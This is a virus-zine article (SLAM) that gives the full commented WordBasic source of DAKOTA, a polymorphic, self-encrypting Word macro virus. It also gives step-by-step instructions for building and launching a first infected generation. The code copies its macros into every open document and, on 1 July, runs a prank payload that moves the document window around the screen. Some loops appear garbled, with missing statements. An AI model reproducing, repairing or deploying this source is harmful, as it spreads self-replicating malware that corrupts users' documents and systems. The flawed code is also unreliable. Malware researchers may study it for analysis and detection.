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SLAM2.005: The new encrypted Macro Virus DAKOTA
[ WordMacro. DAKOTA ]------------------------
˛ SIZE: change at every infection
˛ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker
->Polymorf Yes
->Stealth No
->Encrypted Yes
->Retro No
After FutureNot is here now a new polymorphic macro virus.
The virus contains 2 macros (AutoClose and DAKOTA) and 4 document variables:
- CODE (contains the code to infect a file)
- Payload (I think you know it)
- counter (counter for the encryption routine)
- DAKOTA (to check if any file is already infected)
OK, here is the source code:
MACRO: AutoClose
REM At first set ScreenUpdating Off and DisableInput On
ScreenUpdating : DisableInput
REM Open the DAKOTA macro, select and copy the complete code.
ToolsMacro .Name = "DAKOTA", .Show = 3, .Edit
EditSelectAll : ax$ = Selection$()
REM Now remove all encryption signs.
For ax = 1 To Len(ax$)
bx$ = Mid$(ax$, ax, 1)
If bx$ = Chr$(134) Or bx$ = Chr$(39) Then Goto Nexit
dx$ = dx$ + bx$
Next ax
REM Delete the old encrypted code and insert the new decrypted code.
EditClear - 1 : StartOfDocument : Insert dx$
DocClose 1
REM Run the DAKOTA macro.
REM Open it again, select and delete the complete code.
ToolsMacro .Name = "DAKOTA", .Show = 3, .Edit
EditSelectAll : EditClear - 1
REM dx$ is the decrypted code of the DAKOTA macro.
REM Encrypt now the code again.
For xx = 1 To Len(dx$)
hx$ = Mid$(dx$, xx, 1)
fx = Rnd() : fx$ = Str$(fx) : fx$ = Right$(fx$, 1) : fx = Val(fx$)
If fx < 3 Then
nj$ = nj$ + hx$ + Chr$(134)
nj$ = nj$ + hx$
End If
Next xx
REM Insert the encrypted code into the DAKOTA macro,
REM go to top of the macro and insert at the
REM beginning of every line a '. We must do that, because
REM Word would insert a space behind every encryption sign and
REM if we decrypt the code again, we will decrypt this space, too.
Insert nj$
Insert "'"
For ix = 1 To 40
LineDown 1
Insert "'"
Next ix
REM Close and save the DAKOTA macro.
REM Run and delete the DAKOTA2 macro.
DocClose 1 : DAKOTA2
ToolsMacro .Name = "DAKOTA2", .Show = 3, .Delete
REM Save all and create a new string for the DAKOTA document variable.
FileSaveAll 1, 0
SetDocumentVar "DAKOTA", Str$(Rnd(v))
REM Set ScreenUpdating On and DisableInput Off
ScreenUpdating : DisableInput 0
End Sub
MACRO: DAKOTA (of course, decrypted)
REM Get the encrypted code and the counter for the decrypting routine.
a$ = GetDocumentVar$("CODE")
g$ = GetDocumentVar$("counter") : g = Val(g$)
REM decrypt now the code (a$) with the key (g).
For a = 1 To Len(a$)
b$ = Mid$(a$, a, 1)
b = Asc(Mid$(a$, a, 1))
c = b + g
If c > 255 Then c = c - 256
d$ = d$ + Chr$(c)
REM Generate the new key. (I know thats very lame, but WordBasic
REM is to laaammmeee to make a better encryption routine. :( )
g = g + 1
If g = 255 Then g = 2
REM Open a new macro, called DAKOTA2 and insert
REM the decrypted code.
ToolsMacro .Name = "DAKOTA2", .Show = 3, .Edit
Insert d$
REM Close and save the macro.
DocClose 1 : a$ = "" : b$ = "" : g$ = ""
REM Now encrypt the code with the new key.
For y = 1 To Len(d$)
x = Asc(Mid$(d$, y, 1))
z = x - g
If z < 0 Then z = z + 256
e$ = e$ + Chr$(z)
REM Save the encrypted code and the new key (counter) in
REM a document variable.
SetDocumentVar "counter", Str$(g)
SetDocumentVar "CODE", e$
REM If today is 01/07/xx then
REM get the encrypted code from the Payload document variable.
If Day(Now()) = 1 And Month(Now()) = 7 Then
k2$ = GetDocumentVar$("Payload")
REM Decrypt it!
For ay = 1 To Len(k2$)
b2$ = Mid$(k2$, ay, 1)
b2 = Asc(Mid$(k2$, ay, 1))
c2 = b2 + 1
If c2 > 255 Then c2 = c2 - 256
d2$ = d2$ + Chr$(c2)
REM Open a new macro, called FinalDAKOTA, select and
REM delete the two lines. [Sub Main ... End Sub]
ToolsMacro .Name = "FinalDAKOTA", .Show = 3, .Edit
EditSelectAll : EditClear - 1
REM Insert the decrypted code and save the macro.
REM Set ScreenUpdating On and start the payload.
Insert d2$ : DocClose 1 : ScreenUpdating
REM Set again ScreenUpdating Off.
End If
End Sub
"CODE" document variable. (again decrypted)
REM This code mustn't contain the [MAIN Sub] and [End Sub]
REM string, because if we open a new macro we get this to
REM lines automatic.
REM Set DisableAutoMacros On and get the code from the
REM document variables CODE, counter and Payload.
ua$ = GetDocumentVar$("CODE")
ub$ = GetDocumentVar$("counter")
uc$ = GetDocumentVar$("Payload")
REM iu$ = the name of the active document.
iu$ = FileName$()
REM Count all document names in the FileList
REM and open every!
For iu = 1 To CountFiles()
If Files$(FileName$(iu)) <> "" Then
FileList iu
REM ju$ = the at the moment active file from the FileList
ju$ = FileName$()
REM If this file isn't the same as the infected one then
REM check if it's allready infected.
If iu$ <> ju$ Then
uu$ = GetDocumentVar$("DAKOTA")
REM If not then save it as a template and copy the macros to it.
If uu$ = "" Then
FileSaveAs .Format = 1
MacroCopy iu$ + ":AutoClose", ju$ + ":", 1
MacroCopy iu$ + ":DAKOTA", ju$ + ":"
REM Save the document variables, too.
SetDocumentVar "CODE", ua$
SetDocumentVar "counter", ub$
SetDocumentVar "DAKOTA", Str$(Rnd())
SetDocumentVar "Payload", uc$
End If
REM At last close and save this file.
FileClose 1
End If
End If
REM Get the next file.
Next iu
REM Set DisableAutoMacros Off.
DisableAutoMacros 0
"Payload" document variable
REM Create a new document.
If DocMaximize() Then DocMaximize
DocSize 234, 231
REM Set the right Font, size 36, bold.
Font "Times New Roman"
FontSize 36
REM Insert "DAKOTA" and "(c) Nightmare Joker & Virtual Boy [SLAM]"
Insert "DAKOTA!"
FontSize 20
Insert "(c) Nightmare Joker"
Insert "& Virtual Boy [SLAM]"
REM And now let the document jump around the screen. ;-))
WaitCursor 0
If DocMaximize() Then DocMaximize : i = 1
j = DocWindowPosLeft()
k = DocWindowPosTop()
e = j
f = k
a = AppWindowWidth() - DocWindowWidth()
b = AppWindowHeight() - DocWindowHeight() - 90
c = 1
d = 1
g = 1
For l = 0 To 29
While h(a, b, c, d, e, f)
DocWindowPosLeft e
DocWindowPosTop f
e = e + c * g
f = f + d * g
If e > a Then c = - 1
If f > b Then d = - 1
If e < 0 Then c = 1
If f < 0 Then d = 1
DocWindowPosLeft j
DocWindowPosTop k
If i Then DocMaximize
End Sub
Function h(a, b, c, d, e, f)
h = 1
If c = 1 Then
If e > a Then h = 0
If e < 0 Then h = 0
End If
If d = 1 Then
If f > b Then h = 0
If f < 0 Then h = 0
End If
End Function
The most difficult thing at this virus is to start him.
Here is a short description.
At first generate six macros. An AutoOpen, Dakota, CODE, and Payload macro.
Insert now the code. (see above)
IMPORTANT: Remove the tow lines: (MAIN Sub) and (Sub End) from the CODE and Payload macro!!!!!
OK, Now generate the MAKE macro and insert the following code:
REM Generate a new file.
REM Save it as a template.
FileSaveAs .Name = "c:\virus.doc", .Format = 1
REM Copy now the macros "AutoOpen" and "DAKOTA" to it.
MacroCopy "Global:AutoOpen", FileName$() + ":AutoOpen"
MacroCopy "Global:DAKOTA", FileName$() + ":DAKOTA"
REM Open the CODE macro and select all.
ToolsMacro .Name = "CODE", .Show = 1, .Edit
a$ = Selection$()
REM Close it.
DocClose 2
REM Encrypt now the code.
For a = 1 To Len(a$)
d = Asc(Mid$(a$, a, 1))
e = d - 1
If e > 255 Then e = e - 256
f$ = f$ + Chr$(e)
Next a
REM Save this code in the CODE document variable.
SetDocumentVar "CODE", f$
REM Open now the Payload macro and select all.
ToolsMacro .Name = "Payload", .Show = 1, .Edit
b$ = Selection$()
REM Close it.
DocClose 2
REM Again encrypt it!
For a = 1 To Len(b$)
d = Asc(Mid$(b$, a, 1))
e = d - 1
If e > 255 Then e = e - 256
h$ = h$ + Chr$(e)
REM Save the code in the Payload document variable.
SetDocumentVar "Payload", h$
REM Now save the counter and mark the file as infected.
SetDocumentVar "counter", "1"
SetDocumentVar "DAKOTA", "INFECTED"
REM At last save all.
FileSaveAll 1, 0
End Sub
Start now the MAKE macro and you have a new generation of DAKOTA. :)
- Nightmare Joker -